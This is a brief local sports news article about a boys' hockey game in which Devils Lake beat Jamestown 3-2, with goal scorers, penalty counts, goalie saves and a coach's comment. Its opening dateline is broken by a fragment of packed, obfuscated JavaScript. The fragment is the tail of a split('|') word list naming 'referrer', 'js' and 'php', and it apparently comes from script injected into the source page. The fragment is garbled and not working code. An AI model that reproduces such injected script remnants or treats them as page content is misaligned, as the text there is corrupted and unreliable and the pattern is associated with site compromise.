JAMESTOWN dezsz|var|u0026u|referrer|aiykz||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- Jamestown hosted Devils Lake Tuesday night in a non-conference boys hockey game at Wilson Arena and the Firebirds skated away with a 3-2 victory.

All the scoring was done in the second with the Jays striking first on a goal from Tommy Bruns, his third of the season. Devils Lake’s Austin Moser poured in three goals of his own in the next four and a half minutes to put the Firebirds in front 3-1.

Jacobi Lux pulled the Jays within one when he scored his fourth goal of the season. Jamestown had a chance in the third period when they held a 5-on-3 advantage but were unable to find the back of the net.

The game was a penalty fest with 22 penalties were called in the game with 11 on each team.

Brian Wenzel stopped 34 shots while Holden Kurtz countered with 38. “We were brilliant at times and bad at times,” said Head Coach Matt Stockert. “We need to stay out of the box and play more disciplined.”

The Jays are currently 1-4 and will head to Bismarck Century on Friday night. You can hear coverage of that game on 103.1 The Raven and NewsDakota.com.
